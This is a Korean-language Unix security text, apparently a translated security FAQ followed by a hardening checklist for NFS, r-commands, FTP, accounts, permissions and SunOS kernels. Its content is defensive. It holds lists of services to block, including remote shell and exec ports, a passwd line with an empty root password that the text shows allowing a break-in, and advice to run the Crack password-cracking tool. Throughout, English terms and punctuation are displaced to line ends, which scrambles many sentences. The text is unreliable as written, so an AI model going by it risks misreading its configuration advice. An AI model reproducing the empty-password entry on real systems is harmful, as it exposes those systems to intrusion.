당신 메인 프레임의 파일 저장소를 네트워크 디스크처럼 마운트한다a) .
당신의 또는 또는 등을 편지한다b) /etc/passwd .rhost /etc/hosts.equiv .
다른 사용자로서 아마 당신의 메인 프레임으로 로그인해 들어갈 것이다c) ( “root") .
위의 내용은 를 지원하는 모든 플랫폼에 대해 사실이 아닐지 도 모른다 하지만 나의NFS .
경험에서는 모두 사실이다 비어있는 내용을 만드는 안전한 방법은 다음과(Alec). " " netgroup
같다.
netgroup (-,-,-)
이것은 위의 이 어떠한 도메인상의 어떠한 호스트상의 어느 누구도 허용하지netgroup NIS-
않는다는 의미이다 는 여기에서 보이는 것 보다 훨씬 문제가 많은데 파일이. NFS , Export
하는 일은 당신의 시스템을 해킹하기 위해 클라이언트들이 필요로 하는 키를 노출시NFS
키는데 도움이 될 뿐이므로 파일들에 신중해야 한다 그러한 키들을 추측하는 방법Export .
들이 존재한다 당신의 조직 밖으로부터 들어오는 트래픽을 막도록 당신의 라우터를. NFS
구성하는 것이 신중한 것이다.
어떻게 안전한 패스워드를 생성해 낼 수 있는가Q.13 ?
그렇게 할 수 없다 여기서 중요 단어는 생성한다 인데 일단 패스워드를 만드는 알고리즘. “ ” ,
이 시스템적으로 기술되면 시스템에서의 모든 패스워드를 알기 위해 당신의 알고리즘을 분
석하는 문제가 발생한다 알고리즘이 복잡하지 않다면 알고리즘을 분석하는 것은 매우 짧은.
시간 안에 이루어질 것이고 왜냐하면 그것은 금방 반복되기 시작하므로 이에 따라( )
침입자는 모든 사용자에 대한 패스워드 발생기의 가능한 결과를 시도해 볼 수 있거나a)
침입자가 패스워드 프로그램의 결과를 분석할 수 있고 사용된 알고리즘을 결정하여 패스b)
워드를 알아내기 위해 그 알고리즘을 적용할 수 있을 것이다.
이러한 좋은 예 무작위 숫자 발생기가 무한한 수의 무작위 패스워드를 만든다는 잘못된 가(
정 가 에 자세히 나온다 적절한 양의 다양한 패스워드를 만드는 유일) Morris&Thompson .「 」
한 방법은 만들어내는 것이다 아래 사항에 근거하지 않은 자신의 유연한 방법을 만들어 볼.
수 있다.
당신의 이름 또는 이름 이니셜의 어떤 부분을 고치는 것1) + .
사전단어를 고치는 것2) .
두문자어를 사용하는 것3) .
어떠한 시스터매틱하고 알고리즘에 착된 것4) .
다음과 같은 패스워드는 쓰지 말아야 한다.
이름에 근거하고 있다alec7 - user .
상동tteffum -
여자친구들의 이름 사전에 나온다gillian - ( .)
거꾸로 썼다naillig - .
사전 낱말이다PORSCHE911 - .
입력작업을 타인이 쉽게 볼 수 있다12345678 - .
상동qwertyui -
상동abcxyz -
상동0ooooooo-
대문자를 썼다고 안전한 것은 아니다Computer - .
단순히 무작위 문자를 추가wombat6 -
단순히 무작위 문자를 앞에 추가6wombat -
프랑스 단어이다merde3 - .
사전에 나온다mr.spockn - sci-fi .
지질학 사전에 나온다zeolite - .
지질학 사전에 나오는 단어의 변형ze0lite -
상동ze0llite -
상동z30llt3 -
위의 예들은 사전으로부터 유도된 패스워드 그리고 특정 방법으로 고쳐진 모든 패스워드들,
은 잠재적인 패스워드의 추측 가능성을 가진다는 것을 강조하고자 하는 것이다.
패스워드는 왜 그렇게 중요한가Q.14 ?
당신의 시스템을 향한 공격에 대한 첫 방어가 패스워드이기 때문이다 간단히 말하자면 만.
약 침입자가 당신의 시스템과 동작하지 못하고 패스워드 파일을 읽거나 쓸 권한이 없다면
그는 당신의 시스템을 공격하지 못한다 만약 침입자가 당신의 패스워드 파일을 읽을 수 없.
다면 그리고 당신이 를 쓴다면 당신은 다음을 가정해야한다 침입자는( vanilla modern Unix )
그곳에 있는 어떠한 패스워드도 침해할 수 없다.
만약 침입자가 당신의 패스워드 파일을 읽을 수 있다면 그가 당신의 컴퓨터로 로그인 해서
의 취약점을 통해 로 침입할 수 있다고 가정할 수 있다OS root .
가능한 패스워드들은 얼마나 되는가Q.15 ?
결국 크랙과 같은 프로그램이 사용자의 계정 을 알아내기 위해 모든 가능한 패스워드(root)
조사를 할 수 있을 정도로 성능이 좋아질 것이라는 걱정을 하며 대부분의 사람들이 한번쯤
은 이러한 질문을 한다 간단히 하기 위해 다음과 같이 가정한다면.
유효한 패스워드들이 글자의 집합으로 생성된다1) 62 [A_Za-z0-9].
유효한 패스워드들이 글자에서 글자 길이로 한다 그러면 모든 가능한 패스워드 집합의2) 5 8
크기는
1000000b62 +
10000000b62 +
100000000b62 +
1000000000b62 +
------------
1111100000b62
십진수~=222000000000000 ( )
위의 값은 너무 커서 현재의 기술로 쉽게 모든 가능한 조사를 수행할 수 없다 하지만 더.
많은 글자 기호 구두점 등과 같은 것을 이용할 수도 있다(~<> #$%^&*) .|
모든 개의 비제어 문자를 사용할 수 있다면 더 넓은 탐색범위를 갖게 될 것이다 하지만95 .
아직까지는 침입자가 크랙의 카피를 얻어 어떤 시스템의 계정을 알아내고 그 기계로 로그인
하여 의 구멍을 통하여 의 권한을 얻는 것이 더 효율적이다OS root .
위의 수치들을 위안 삼기 바란다 튼튼한 패스워드 파일로 잠재적인 침입자들의 앞에서 문.
을 견고하게 닫을 수 있다면 당신은 대부분의 공격의 길들을 차단한 것이다.
정보보호에 대해 얼마나 어리석어질 수 있는가Q.16 ?
이번에는 예를 통하여 배우는 내용이다 사람들이 실제 생활의 보안사건에 대하여 읽을 기.
회가 있다면 독자들에게 그것을 경험하는 고통 없이 컴퓨터 보안의 중요성을 주입시킬 수
있을 것이다.
From: [email protected]
가장 적당한 얘기는 주요 컴퓨터 제작회사에서 산업체 실습을 하고 있는 밥이라는 나의 친
구의 이야기이다 노는 날에 밥은 학교로 돌아와서 나의 시스템에 를 돌리곤 했. AberMUD
다 회사에서 밥의 일은 시스템 관리에 관련이 있고 그 회사는 보안에 매우 엄격하였다 그.
래서 모든 패스워드들은 특별한 순서 없는 임의 스트링이었다 패스워드가 안전해야함은 당.
연했다 이것은 무작위 패스워드를 적어서 큰 금고에 넣어두는 것을 포함한다.( .).
어느 날 일시적인 생각으로 나는 크랙의 사전으로서 퍼스널 파일 패스워드를 입력시MUD
켰다 패스워드는 보통문장으로 기억되었다 그리고 나서 우리의 시스템 패스워드 파일에서( )
크랙을 실행시켰다 몇 명의 학생 가 나왔지만 특별한 것은 아니었다 나는 학생들에. account .
게 그들의 패스워드를 바꿀 것을 말했다 나는 게을러서 크랙 사전에서 패스워드들을 제거.
하는 것을 잊어버렸다 그리고 내가 에 다음버젼을 올렸을 때 그것들도 같이 올려. USENET
졌다.
그것은 에게 갔고 다시 에 올려졌다 그리고 결국은comp.sources.misc moderator USENET .
의 회사로 갔다 왕복거리가 약 마일이 됐다 밥은 착실한 학생 시스템 관리자여서Bob 10,000 .
그것이 도착했을 때 새로운 버전의 크랙을 실행시켰다 그것이 그의 기계에서 패스워. root
드를 막 만들어내자 밥은 거의 기절할 뻔했다 이 이야기의 핵심은 다른 두 곳에서 같은 패.
스워드를 쓰지 말고 특히 와 같은 믿지 못할 시스템에서는 더욱 그렇게 하라는 것이MUD
다.
From: [email protected] (Dan Zerkle)
우리과에는 조사 프로잭트를 갖지 않는 대학원생을 위한 워크스테이션이 있는 방이 있다.
당신이 계정이 없어도 터미널로 이 워크스테이션을 쓸 수 있다 특별한 로 불리는. terminal
널 패스워드를 받아들이는 짧은 프로그램을 실행시켜 당신이 선택한 기계에 연결시켜주는
을 실행시킨다 나는 이 시스템을 사용했었는데 실수로 나의 사용자 이름을 입력하기rlogin .
전에 리턴을 눌렀다 다시 나갈 방법이 없어서 패스워드 입력할 때도 그냥 리턴을 눌렀다. .
이렇게 되자 내가 연결하는 기계는 패스워드 파일에 다음과 같은 내용을 가지고 있어Tekl
기호가 빠진 패스워드 엔트리임::0:1::: ("+" YP/NIS )
터미널 프로그램이 기계에 연결시켜주고 로 로그인 시켜준 것 에 내가 얼마나 놀랐겠는root
가 나는 시스템 관리자에게 메일을 보내서 그를 놀라게 하려고 로 보냈다 몇일 이내로. ( root )
문제를 고쳤다 정상적으로 패스워드 파일의 내용은 문제가 아니었다 정상적인 로그인의 방. .
법은 사용자 이름으로 입력하게 돼있다 하지만 터미널 로그인은 사용자 이름으로 널 스트.
링을 받아들여 을 통해 그것을 호스트 컴퓨터에 전달했다 그래서 우연히도 그 기계의rlogin .
를 침입하게 된 것이다root .
햎From:[email protected]. .au (John Bennett)
당신은 사람들이 얼마나 바보가 될 수 있는가에 대한 조언을 부탁했다 여기에 간단하지만.
종종 반복되는 이야기가 있다 나의 아들이 새차를 샀다 그래서 보험에 들기 위해 자동차. .
조합의 지방 사무소로 갔다 멋진 아가씨가 약관의 내용들을 정리하는데 효율적으로 도와주.
었다 서류작성이 끝나자 그 아가씨는 사무실을 건너 컴퓨터 터미널로 가서 앉은 다음 다른.
멋진 아가씨를 불렀다.
아직도 이 패스워드입니까 컴퓨터 회사 이름(censored )?
From:Alec.Muffett@UK>Sun.COM
그의 죄 때문에 아직도 익명으로 남아있기를 원하는 나의 친구의 주의 깊은 이야기 특히 병
적인 광적이지는 않지만 보안정책을 가진 한 영국 대학에서 시스템 관리자가 명령어( ) “su”
에 대한 허락을 변경했다 을 없앤 것이다 그리고 그 직원들의 일. world excute permission .
원들에게만 가능하게 했다 하지만 직원들에게 로부터. /dev/console world-write permission
을 제거하도록 하는 것이 충분히 알려지지 않았다 나의 친구 은 이 대학에 다녔고 우연. Ian
히 동료 사용자 에게 괴로움을 당했다 은 모든 사람의 터미널에 누비고 다(foobarl) . Foobarl
녔고 그의 동료들을 훔쳐보곤 하였다 그리고 예절을 지키지 않았다 그래서 그에게 복수하. .
기 위해 은 다음과 같이 했다 은 다음과 같이 자주 프린트하는 스크립트를 썼다Ian . Ian .
BAD SU: foobarl on tty0a at 12:34:56
이 시스템에서 가기 위한 는 직원들만 쓸 수 있는 것이기에 이것은 오퍼레이터를rootdp ‘su’
걱정하게 했을 것이다 얼마 후 은 다음과 같이 했다. Ian .
SU: foobarl on tty0a at 12;45;03
초후 이 머신은 크래쉬됐고 오퍼레이터 팀은 이 해커를 가만히 두고 잡기로 했다 그리고30 .
그들은 터미널실로 가서 을 잡아 범인이 그가 아니라는 것을 알 때까지 그에게 한foobar1
시간쯤 소리쳤다 나는 이 에게 사과해야한다고 믿지만 그들은 결코 제대로 하지. lan foobar1
않았다.
이 이야기의 핵심은 사고 동안에는,
놀라지말아라 놀라게 되면 당신은 멍청한 행동을 하게될 것이다1) - .
2) 을 믿지 말아라audit trail .
해킹 방지를 위한 시스템 점검 목록
개요1.
지금까지 우리는 인터넷에서의 보안에 대해 많은 내용들을 다루어 왔다 인터넷에서의 보안.
사고란 무엇이며 해커 혹은 침입자들에 대해서도 알아보았고 보안 정책을 세우는 방법 유, , ,
닉스에서의 보안 인터넷 보안 대책으로서 보안 방화벽 시스템 보안사고 처리 등을 살펴 본, ,
것이다 이제 결론과 요약으로서 인터넷 유닉스 시스템에서의 보안점검목록을 정리하고자. /
한다.
점검 목록 설명2.
가 패치. (Patches)
업체나 네트워크 공개서버로부터 가장 최신 버전을 설치한다 이 경우 새로 설치된 후1) .
디폴트 구성으로 복원되는 경우가 있으므로 주의한다.
서명등의 디지틀 서명 값을 확인한다 을 이용한 서명은 신뢰하지 않2) PGP, MD5 . sum(1)
도록 해야한다.
나 네트워크 보안. (Network security)
필터링1) (Filtering)
별도로 허용된 네트워크 서비스만이 내부로 들어올 수 있도록 라우터에서 막는다.
다음과 같은 서비스들은 막도록 한다.
NAME PORT PROTOCOL NAME PORT PROTOCOL
ꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚꠚEcho 7 에TCP/U login 513 TCP
systat 11 TCP shell 514 TCP
netstat 15 TCP printer 515 TCP
bootp 67 UDP biff 512 UDP
tftp 69 UDP who 513 UDP
link 87 TCP syslog 514 UDP
supdup 95 TCP uucp 540 TCP
sunrpc 111 TCP/UDP route 520 UDP
NeWS 144 TCP openwin 2000 TCP
snmp 161 UDP NFS 2049 UDP/TCP
xdmcp 177 UDP X11 6000 to 6000+n TCP
exec 512 TCP 은 서버의 최대값(n X )
명령2) “r"
명령들이 필요없다면 등을 시킨다“r" rsh, rlogin Disable .О
만약 명령을 써야 한다면“r"О
보다 안전한 버전을 사용한다 의 은 안전한 명령을 사용. Wietse Venema logdaemon “r"・할 수 있도록 하는데 가 아닌 단지 만을 참조하고, $HOME/.rhosts /etc/hosts.equiv
옵션을 허용하지 않는다wildcards(‘+’) .
명령을 사용한다면 포트를 라우터에서 막는다 이것은 외부에서의512, 513, 514 (TCP) .・접속을 막게 된다.
를 이용하여 네트워크 서비스에 대한 접근 제어 및 로그를 만든다tcp_wrappers .・
3) /etc/hosts.equiv
적은 수의 신뢰하는 호스트 를 가진다(TRUSTED hosts) .О
만약 나 를 사용한다면 효과적인 관리를 위하여 를 이용한다NIS NIS+ netgroups .О
자신의 도메인내에 있는 호스트만 신뢰한다.О
전체 도메인이름을 사용한 호스트 이름을 사용한다. (hostname.domainname.kr)О
엔트리를 갖지않도록 한다'+' .О
라인을 갖지않도록 한다‘!’, ‘#’ .О
첫글자에 가 없도록 한다‘-’ .О
파일의 접근권한이 소유자는 가 되도록 한다600, root .О
4) /etc/netgroup
만약 를 이용한다면 각 은 사용자이름이나 호스트이름만을 가지도NIS(YP),NIS+, netgroupО
록 한다.
5) $HOME/.rhosts
명령을 사용한다면 다음을 꼭 따른다"r" .О
어떤 사용자도 를 홈디렉토리에 가지지 않도록 한다 보다 큰 위.rhosts . /etc/hosts.equiv・험을 가지게 되지만 각 개인 별로 허용해 주는 것이 좋다.
이것을 점검하는 을 실행한다cron .・를 사용해야 한다면$HOME/.rhostsО
파일의 첫글자가 가 되진 않게 하고‘-’ ,・이것의 권한이 소유주는 당사자의 것으로 한다600, .・어떤 라인에도 를 갖지 않게 하며“+” ,・
내에 를 허용하지 않는다.rhosts netgroups .・를 사용하지 않으며‘!’, ‘#’ ,・
을 이용하여 를 제한할 수 있다logdaemon , $HOME/.rhosts .・
6) NFS
라우터에서 트래픽을 필터링 한다 포트 패치를 한다NFS . 111, 2049(TCP/UDP) .О
가능하다면 를 사용하지 않는다NFS .О
포트를 모니터링한다 파일시스템 마운트를 위한 호출은 이하에서 받아들이도NFS . 1024О
록 한다.
나 에는 반드시 필요한 것만 한다/etc/exports /etc/dfs/dfstab export .О
서버 자체의 파일시스템을 해서는 안된다NFS export .О
파일이 엔트리를 가지지 않도록 한다exports ‘localhost' .О
전체 도메인이름에 의한 호스트이름을 사용한다. (machinename.domainname.kr).О
리스트가 문자를 넘지 않도록 한다 만약 이를 초과할 경우 외부의 모든 호export 256 . ,О
스트를 신뢰하는 결과를 초래한다.
을 전 파일 시스템에 대해 실행한다fsirand .О
실수로 파일시스템을 외부에 개방시키지 않는다.О
옵션을 적절히 사용한다-access=host.domainname.kr .О
가능하다면 파일시스템을 읽기 전용 으로 운용한다(-ro) .О
를 사용해야 한다면 옵션을 사용한다NIS secure .О
를 사용하며 어떤 파일시스템이 개방되는지 감시한다“showmount -e" .О
의 접근권한은 소유자는 가 되어야 한다/etc/exports 644, root .О
나 가 클라이언트로부터의 불법요청을 받지 않도록 한다portmapper rpcbind .О
의 변경은 를 실행한 후에야 인정된다/etc/exports /usr/etc/exportfsf .О
7) /etc/hosts.lpd
이 파일의 첫 문자가 가 되어서는 안된다‘-’ .О
이 파일의 접근 권한은 소유주는 가 되어야 한다000, root .О
이 파일내에 나 이 사용되어서는 안된다“!” “#” .О
보안터미널8) (Secure terminals)
이것은 나 에 해당된다/etc/ttys, /etc/default/login /etc/security .О
로 직접 로그인할 수 없도록 모든 옵션을 제거한다 가능하면 에서도root “secure" . consoleО
이 옵션을 제거하는 것이 좋다.
이 파일의 접근 권한은 소유자는 로 한다644, root .О
9) Network services
/etc/inetd.confО
이 파일의 접근권한은 소유자는 여아 한다600, root .・불필요한 서비스를 삭제한다 불필요한 서비스의 삭제는 해당하는 라인의 첫 란에 을. “#”・
넣으면 되고 특히 명령과 등을 꼭 없앤다 이 작업은 프로세스를 다시 시작하“r" tftp . inetd
면 된다.
PortmapperО
시스템 시작시 불필요한 서비스를 에서 제거한다portmapper .・
10) Trivial ftp (tftp)
불필요하면 에서 제거하고 반드시 필요하다면 옵션을 사용한다/etc/inetd.conf , secure .
11) /etc/services
파일의 접근권한은 소유자는 가 되어야 한다644, root .
로도 알려져 있음12) tcp_wrapper (log_tcp )
이 패키지를 꼭 설치하는 것이 좋다 모드를 가지도록 하고 인증 서. PARANOID , RFC931 (
버 기능을 사용하는 것이 좋으며 에 을 넣어 모든 접근을 막고 접근) , /etc/hosts.deny “all:all" ,
을 허용해야 할 호스트라면 에 하나씩 정의 하는 것이 좋다/etc/hosts.allow .
13) /etc/aliases
으로 별명이 있는 것들을 제거한다 이러한 변경이 효과를 가지려면"#" “decode" .О
를 실행해야 하며 를 사용한다면 을 다시 만든다/usr/bin/newaliases , NIS NIS Map .
별명에 의해 실행되는 모든 프로그램은 모드에 소유자는 가 되어야 한다755 root .О
14) Sendmail
현재 을 사용한다 이것만이 발견된 취약점이 없다Eric Allman's sendmail 8,x ( 8.7.3) . .О
다른 업체 제품을 사용한다면 가장 최신 패치를 설치한다.О
옵션을 지원하지 않는 을 사용한다wizard sendmail .О
의 최소 로그 수준을 수준으로 한다sendmail “9” .О
에서의 로그 수준을 높인다syslog .О
15) majordomo
보다 최근의 것을 사용한다Version 1.91 .О
16) fingerd
월 일 이후의 버전을 사용한다11 5 .О
는 침입자들이 시스템에 대한 많은 정보를 알 수 있게 하므로 가능한 불필요한 것fingerО
은 제한하는 것이 좋으며,
은 침입자가 어떤 파일도 볼 수 있게 하므로 사용하지 않는다GNU finger v1.37 .О
17) UUCP
을 가진 계정을 사용하지 않는다Shell uucp .О
홈디렉토리에 를 제거한다uucp .rhosts .О
는 소유주가 이어야 하다L.cmds root .О
소유주의 파일들이 완전히 개방되지 않도록하며uucp ,О
에서 실행할 수 있는 명령을 제한한다uucp .О
가능한 시스템을 사용하지 않는다uucp .О
18) REXD
서버는 보안이 제공되지 않으므로 서비스에서 제거한다rexd .О
19) World Wide Web (WWW) - httpd
최신의 데몬을 사용 한다http .О
데몬을 와 같은 권한 없는 사용자에의해 실행한다 이렇게 함으로서 침입자가http httpd .О
취약점을 발견했다하더라도 제한될 수 있다.
서버 데몬과 클라이언트를 프로세스로 실행하지 않는다root .О
를 환경에서 실행하여 클라이언트가 다른 디스트 접근을 막는다httpd chroot(1) .О
명령이 없는 를 이용한다chroot(1) chrootuid .О
서버의 구성 옵션을 주의하여 맞춘다.О
파일에서 중요한 디렉토리등에 대한 접근을 제한한다“include" .О
을 사용한다CGIWRAP .О
불필요한 를 사용하지 않는다CGI(Common Gateway Interface) .О
프로그램의 활용에 주의하는데 클라이언트에서 시스템의 문제점을 침투할 수 있으CGI ,О
므로 주의하는 것이다 모든 서버의 문제는 여기에서 온다. .
를 가능한 스크립트가 아니라 링크된 실행파일로 만든다CGI .О
디렉토리의 파일 소유주 접근권한 등을 잘 만든다cgi-bin , .О
사용자가 직접 입력하는 프로그램명령 등이 직접 전달될 수Perl, AWK, UNIX shells,О
없도록 한다.
등의 특수 문자들을 필터링한다₩n₩r (.,/;~!>|^&$'< .О
다 와 익명. FTP FTP
1) Versions
최신의 버전을 사용한다ftp .О
를 가능한 사용한다Washington University ftpd .О
에서는 를 사용한다BSD/386 BSDI v1.0 patch 005 .О
2) Configuration
서버의 디폴트구성을 면 히 살핀다ftp .О
가 명령을 가지지 않은지 체크한다ftp SITE EXEC .О
에 적절하지 않은 접근을 허용하지 않는지 점검한다 여기에서는/etc/ftpusers ftpd . root,О
나 업체에서 제공된 특별한 것만 허용한다bin uucp, ingres, daemon, nows, nobody .
에서만 해당되는 내용3) Anonymous ftp
에서 패스워드는 전자우편주소 형태로 받을 수 있도록 한다Anonymous FTP RFC822 .О
를 없애거나 의 파일을 옮기거나 지울 때 패스워드 파일에서 계정을 지운다Aftp “ftp ftp .О
서버의 구성FTP・모든 에 대해 구성할 수 있는 것은 아니다 만약 와 같은 버전을 가지고 있- FTP . wu-ftp
다면 계정 사용자의 및 옵션을guest, anonymous delete, overwirte, rename, chmod umask
없앤다.
등에 에 실행가능한 어떤 명령이나 쉘 등을- ~ftp/bin, ~ftp/usr/bin, ~ftp/sbin SITE EXEC
두지 않는다.
패스워드 파일의 엔트리에 적적하게 지정한다 다음과 같은 형태가 되어야 한다- . .
ftp:*:400:400:Anonymous FTP:/home/ftp:/bin/false
홈 디렉토리 의 모드는 소유주는 가 되어야 한다- ~ftp (~ftp) 555, root .
가 실제 패스워드의 복사본을 가져서는 안된다- ~ftp/etc/passwd .
에 실제 의 복사를 가져서는 안된다- ftp/etc/group /etc/group .
와 를 가져서는 안된다- ~ftp/.rhosts ~ftp/.forward .
접근 권한(Permissions)・어떤 경우라도 계정 소유의 파일과 디렉토리를 두지 않는다- ftp .
사용자는 경개 구역에서의 파일만 읽을 수 있도록 한다- ftp .
와 의 서브디렉토리의 모든 파일은 모드 소유가 되어야 한다- ~ftp/etc ~ftp/bin 111 , root .
의 소유자는 모드는 이 되어야 한다- /usr/spool/mail/ftp root, 400 .
Writable directories・쓰기가능한 디렉토리를 가져서는 안된다- .
쓰기가능한 디렉토리가 읽기 가능해서도 안된다- .
쓰기가능한 디렉토리는 소유가 되고 모드는 이 되어야 한다- root , 1733 .
디스크 마운트・내에 어떤 외부 기계의 디스크로 마운트하지 않는다- ~ftp .
라. Password and account security
패스워드 정책1)
기관의 패스워드 정책을 꼭 가진다.О
패스워드 신청 양식을 각 시스템 별로 가지고 운영한다.О
사전 점검2)
잘못된 패스워드를 가려내는 방법을 제공한다.О
으로 잘못된 패스워드를 주기적으로 점검한다Crack .О
가능한 패스워드 을 수행한다Aging .О
와3) NIS, NIS+ /etc/passwd entries
꼭 필요하지 않다면 등을 사용하지 않는다NIS, NIS+ .О
가 필요하다면 차라리 를 사용한다NIS NIS+ .О
내에 를 가진 기계는 마스터가 아니라 클라이언트에만 허용한다/etc/passwd “+” .О
에서 를 항상 옵션으로 실행하는데 모든 기계가 다 제공하는 것은/etc/rc.local ypbind -s ,О
아니다.
를 사용한다secure RPC .О
새도우 패스워드4) (Shadow Password)
업체 제공이나 공개 제품들을 사용한다.О
불법적으로 더해진 것이 없는지 주기적으로 점검한다.О
계정 및 패스워드 관리5)
정기적으로 패스워드를 점검하고 계정 재계약 방법을 통해 새롭게 갱신한다.О
모든 패스워드를 가져야 한다.О
사용자 구역을 백업한다.О
실행에 대한 정기적인 모니터링이 필요하다su .,О
반복된 로그인 실패나 거부에 대해 정기적으로 점검한다.О
사용자에게 허가된 구역 싸이즈를 점검한다.О
특수 계정6)
계정을 공유하는 것을 허용하지 않으며 계정을 만들지 않는다, guest .О
업체에서 만든 운영체제를 위한 특별한 계정을 허용하지 않으며 패스워드 없이 명령을,О
실행하는 계정을 만들지 않는다.
등의 시스템 계정에는 등의 기능이 없는 셀을 할당한다bin, sync, daemon /bin/false .О
에 시스템 계정을 두어 를 사용할 수 없도록 한다/etc/ftpusers ftp .О
계정7) Root
패스워드를 알고 있는 사람을 최소화한다root .О
네트워크에서 직접 로 로그인 못하게 하며 일반 사용자에서 를 이용한다root , su .О
를 가져서는 안되면 명령어 패스에 을 가져서는 안된다~/.rhosts , “.” .О
의 파일들과 작업들은 소유가 아니거나 그룹 소유이거나 개방된 파일root login cron rootО
을 해서는 안된다Source .
에서는 항상 의 명령을 사용한다root Full Path .О
파일8) .netrc
파일을 가능한 사용하지 않는다.netrc .О
약 꼭 사용한다면 패스워드 정보를 두지 않는다.О
패스워드 파일의 필드9) GCOS
여기에 기관에 관한 정보 등을 기입하지 않는다 만약 유출시 문제가 될 수 있다. .О
마 파일시스템 보안.
일반1)
절대 파일을 두지 않는다.netrc .О
파일 기능을 없애기 위해 환경을 사용할 것을 검토한다.exrc EXINIT .О
각 사용자의 홈에 있는 파일이 불법 명령을 수행하지 않도록 한다.forwrd .О
시작과 끝에 사용되는 스크립트들2)
이것들이 를 가지지 않도록 한다666 motd .О
에 사용되었던 잠정 파일들을 없애기 위한 혹은 유사한 명령/etc/motd “rm -f/tmp/t1"( )○
들을 가지지 않도록 한다.
3) /usr/lib/expreserve
이 이 년 월 바젼 이전 것을 사용하지 않는다 이것이 없다면 이/usr/lib/expreserve 1993 7 .○
것의 실행 모드를 삭제한다.
외부 파일시스템과 디바이스4)
파일시스템을 와 읽기 전용으로 마운트 한다non-setuid .○
파일 접근 권한 모드5)
/etc/utmp : 644○
/etc/sm, /etc/sm.bak : 2755○
/etc/state : 644○
/etc/motd, /etc/mtab : 644○
를 재시작하면 다시 리세트 된다/etc/syslog.pid : 644 * syslog .○
는 소유 그룹은 라면 이 되어야 하며 모드는 가 되Kernel(/vmunix) root SunOS wheel , 644○
어야 한다.
는 소유가 되어야 한/etc, /usr/etc, /bin, /usr/bin, /sbin, /usr/sbin, /tmp, /var/tmp root○
다.
와 는 스티키비트 가 지정되어야 한다/tmp /var/tmp (sticky-bit) .○
디렉토리에 불필요한 쓰기 가능 파일이나 디렉토리가 있어서는 안된다.○
파일들을 점검한다SUID.SGID .○
사용자들의 가 이나 이 되어있는지 점검한다umask 027 077 .○
의 모든 파일이 특수 파일인지 점검한다/dev .○
이외에 불필요한 특수파일이 있는지 점검한다/dev .○
실행 파일들6) root
다음 파일들의 내용을 점검한다.
~/.login, ~/.profile○
~/.exrc○
~/.logout○
과 내용crintab○
에서의 파일들NFS○
/etc/rc*○
소유들7) Bin
쓰기 개방되지 않은 소유의 모든 와 파일들의 소유를 그룹bin non-setuid non-setgid ID○
의 로 바꾼다0 root .
8) Tiger/COPS
둘 다 설치하거나 최소 하나는 설치 운영한다.○
9) Tripwire
수동적으로 실행한다.○
실행파일과 데이터베이스 등을 쓰기 금지 하드웨어에 저장한다, Configuration .○
바 업체별 보안.
1) SunOS 4.1x
패치(Patches)○
ftp://sunsolve1.sun.com/pub/patches/*
포워딩 소스라우팅IP /○
이것은 을 베스쳔호스트 나 이중네트워크호스트 으로SUN (bastion host) (duel homed system)
사용할 경우에 필요하다.
포워딩을 제거한다 커널 에 을 넣는데IP . configuration options "IPFORWARDING=-1" ,∙
자세한 사항은 를 참고한다/usr/sys/'arch'/conf/README .
소스라우팅을 제고하는 것을 고려한다 이것을 그대로 둘 경우 불법적인 트래픽이 발생.∙
할 가능성이 있다 이것을 제거하는 공식적인 방법은 없으며 다만 비공식적인 접근방법으로. ,
서 다음을 참고한다.
ftp://ftp.auscert.org.au/pub/mirrors/ftp.greatcircle.com/v03.n153.Z
프레임버퍼(Framebuffers) /dev/fb○
만약 원격지에서 로그한 경우라면 프레임버퍼 의 내용을 볼 수 있다 콘솔에서 로, (/dev/fb) .
그한 사용자는 을 이용하여 프레임버퍼에 대한 제한된 접근을 할 수 있다 샘플/etc/fbtab , .
을 보인다/etc/fbtabd .
#
# File: /etc/fbtab
# Purpose: specifies that upon login to /dev/console, the
# owner, group and permissions of all supported
# devices, including the framebuffer, will be set to
# the user's username, the user's group and 0600.
# Comments: SunOS specific.
# Note: You cannot use to continue a line.₩
#
# Format:
# Device Permisson Colon separated device list.
#
/dev/console 0600 /dev/fb
/dev/console 0600 /dev/bwone0:/dev/bwtwo0
/dev/console 0600
/dev/cgone0:/dev/cgtwo0:/dev/cgthree0
/dev/console 0600
/dev/cgfour0:/dev/cgsix0:/dev/cgeight0
/dev/console 0600 /dev/cgnine0:/dev/cgtwelve0
#
/dev/console 0600 /dev/kb:/dev/mouse
/dev/console 0600 /dev/fd0c:/dev/rfd0c
위의 파일을 생성한 후 재시동하거나 완전히 로그아웃한다.
의 패키지에서 제공하는 으로 교체하면 유사한 효과를 가질Wietse Venema logdaemon login
수 있다.
/usr/kvm/sys/*○
하의 모든 파일들과 디렉토리들이 그룹에 의해 쓰기 가능하도록 하지 않는다/usr/kvm/sys/ .
에서는 디폴트로 그룹스탭에 를 주고 이것은 커널 을 허용한다SunOS 4.1.4 2755 Trojan .
/usr/kvm/crash○
에 대한 권한을 제거하는데 다음을 이용한다/usr/kvm/crash gergid .
# /bin/chmod g-s/usr/kvm/crash
그룹은 사용자로 하여금 실행 시스템의 가상메모리를 읽도록 한다kmem .
/dev/nit (Network Interface Tap)○
시스템이 모드를 가지고 있는지 을 이용하여 점검한다promiscuous cpm .
모드가 필요 없다면 인터페이스를 없앤다promiscuous /dev/nit .∙
와 시스템에서는 커널에서 제거한다* SunOS 4.x Solbourne .
매뉴얼을 참고한다 요약하면 다음과 같다* . .
# cd/usr/kvm/sys/sun[3,3x,4,4c]/conf
# cp CONFIG_FILE SYS_NAME
# chmod +w SYS_NAME
# vi SYS_NAME
#
# The following are for streams NIT support. NIT is used by
# etherfind. traffic, rarpd, and ndbootd. As a rule of thumb.
# NIT is almost always needed on a server and almost never
# needed on a diskless client.
#
pseudo-device snit # streams NIT
pseudo-device pf # packet filter
pseudo-device nbuf # NIT buffering module
번째 라인의 부분을 코넨트로 막고 저장한다3 “pseudo-device" .
# config SYS_NAME
# cd ../SYS_NAME
# make
# mv /vmunix /vmunix.old
# cp vmunix /vmunix
# /etc/halt
> b
Loadable drivers option○
커널에서 에 대한 옵션을 제거한다 이것은 커널 구성에서loadable modules .
options VDDRV #loadable modules
라인을 제거하고 다시 커널 컴파일하면 된다.
포트 모니터링NFS○
